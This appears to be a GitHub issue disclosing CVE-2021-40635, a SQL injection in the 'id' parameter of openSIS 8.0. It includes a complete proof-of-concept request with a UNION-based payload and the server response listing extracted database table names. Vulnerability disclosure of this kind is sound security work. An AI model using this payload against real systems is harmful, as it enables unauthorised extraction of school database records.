Headline
CVE-2021-40635: SQL Injection in id Parameter · Issue #195 · OS4ED/openSIS-Classic
OS4ED openSIS 8.0 is affected by SQL injection in ChooseCpSearch.php, ChooseRequestSearch.php. An attacker can inject a SQL query to extract information from the database.
Due to no security mechanism was implemented in parameter id, attacker can inject arbitrary SQL query and extract database informations
Vulnerable code section
ChooseCpSearch.php
ChooseRequestSearch.php
Request and Response
GET /ChooseRequestSearch.php?id=1’+union+select+1,group_concat(table_name),3+FROM+information_schema.tables+WHERE+table_schema=database()–±&table_name=courses HTTP/1.1 Host: demo.opensis.com User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Connection: close Referer: http://demo.opensis.com/Modules.php?modname=miscellaneous/Portal.php&failed_login= Cookie: PHPSESSID=hlbs4pioon9tgupfig1n2hsgu1
HTTP/1.1 200 OK Date: Wed, 01 Sep 2021 15:34:05 GMT Server: Apache/2.4.7 (Ubuntu) X-Powered-By: PHP/5.5.9-1ubuntu4.29 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1194 Connection: close Content-Type: text/html
course_modal_request||3 courses were found.
Course
Reading
Writing
api_info,app,attendance_calendar,attendance_code_categories,attendance_codes,attendance_completed,attendance_day,attendance_period,calendar_events,calendar_events_visibility,course_details,course_period_var,course_periods,course_subjects,courses,custom_fields,device_info,eligibility,eligibility_activities,eligibility_completed,enroll_grade